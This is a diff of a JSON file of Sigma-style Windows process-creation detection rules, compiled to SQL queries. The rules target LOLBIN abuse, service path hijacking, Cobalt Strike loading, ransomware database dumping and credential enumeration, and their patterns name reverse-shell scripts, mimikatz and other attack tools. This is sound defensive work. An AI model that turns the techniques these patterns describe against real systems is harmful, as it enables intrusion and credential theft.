"SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Use of Mftrace.exe", - "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "title": "Stop Windows Service Via Sc.EXE", + "id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", "status": "experimental", - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali 
(Nextron Systems)", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate use for tracing purposes" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\') AND NOT ((CommandLine IN ('sc stop KSCWebConsoleMessageQueue', 'sc stop LGHUBUpdaterService') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_mftrace.yml" + "filename": "proc_creation_win_sc_stop_service.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, 
Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", - "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", + "status": "test", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", "author": "Florian Roth (Nextron Systems)", + "tags": [ + 
"attack.execution" + ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential Suspicious Registry File Imported Via Reg.EXE", - "id": "62e0298b-e994-4189-bc87-bc699aa62d97", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.collection", + "attack.t1560.001" ], 
"falsepositives": [ - "Legitimate import of keys" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "status": "test", + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - 
"Unlikely" + "Administrative activity" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_dridex.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Potential Password Spraying Attempt Using Dsacls.EXE", - "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", "status": "experimental", - "description": "Detects possible password spraying attempts using Dsacls", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", 
"author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1218" + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use of dsacls to bind to an LDAP session" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dsacls_password_spray.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "Explorer Process Tree Break", - "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", - "status": "test", - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", + "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "status": "experimental", + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. 
These files are simply XML and contain paths to various Windows 10 settings binaries.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1204", + "attack.t1566.001", + "attack.execution", + "attack.initial_access" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_break_process_tree.yml" + "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" }, { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "title": "HH.EXE Execution", + "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"hh.exe\" to execute \".chm\" files.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ], "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "False positives are expected with legitimate \".CHM\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR 
CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%.chm%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_hh_chm_execution.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 
'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", - "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "status": "test", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine 
LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", - "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Enumeration for Credentials in Registry", + "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "status": "test", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' 
